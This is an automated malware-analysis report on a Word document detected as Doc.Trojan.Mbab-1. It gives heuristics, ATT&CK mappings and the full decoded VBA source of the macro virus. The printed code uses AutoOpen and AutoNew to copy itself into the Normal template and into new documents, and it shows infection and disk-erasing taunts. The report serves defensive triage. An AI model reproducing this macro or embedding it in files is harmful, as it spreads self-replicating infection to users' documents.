MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The AutoOpen macro executes upon opening the document. It checks for the existence of 'c:\windows\system\MBAB.txt' and if not found, saves the active document to 'c:\windows\system\MBAB.Doc'. It then copies the macro module to the user's default template ('normal.dot') and displays a message box indicating infection. This sequence of actions suggests an attempt to establish persistence and potentially deliver a secondary payload.
Heuristics 7
-
ClamAV: Doc.Trojan.Mbab-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mbab-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1556 bytes |
SHA-256: cdec33d5335fb9deaffba4d1ec326e6b2a9e9b38ee0222cb1ce0006beb955b64 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists("C:\windows\system\MBAB.txt") = False Then
ActiveDocument.SaveAs ("c:\windows\system\MBAB.Doc")
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:="c:\windows\Application data\microsoft\modиles\normal.dot", _
Name:="Module1", _
Object:=wdOrganizerObjectProjectItems
MsgBox "Vous venez d'ouvrir un document infectй par MBAB !!", vbExclamation + vbOKOnly, "Windows_Class_4°"
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("c:\Windows\System\MBAB.txt", True)
a.WriteLine ("|sz@@#gbbt{^#@@@#^---[Mґ`~??/B^Ё%%$ +%щ^ A^*Ё%BЁPM.0")
a.Close
Else
End If
End Sub
Sub AutoNew()
Application.OrganizerCopy Source:="C:\Windows\system\MBAB.doc", _
Destination:=ActiveDocument.FullName, _
Name:="Module1", _
Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoExit()
MsgBox "0101010001011101010101MON1010010011110100101001001NOM0101010EST10100100011110100010010MBAB0101001101101010101001ERASE1010101011001001101010YOUR10101101010110010101010H00010001011A01001011R101010D0010101110011010111010DISK11101010101011110000101", vbExclamation, "MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB MBAB"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.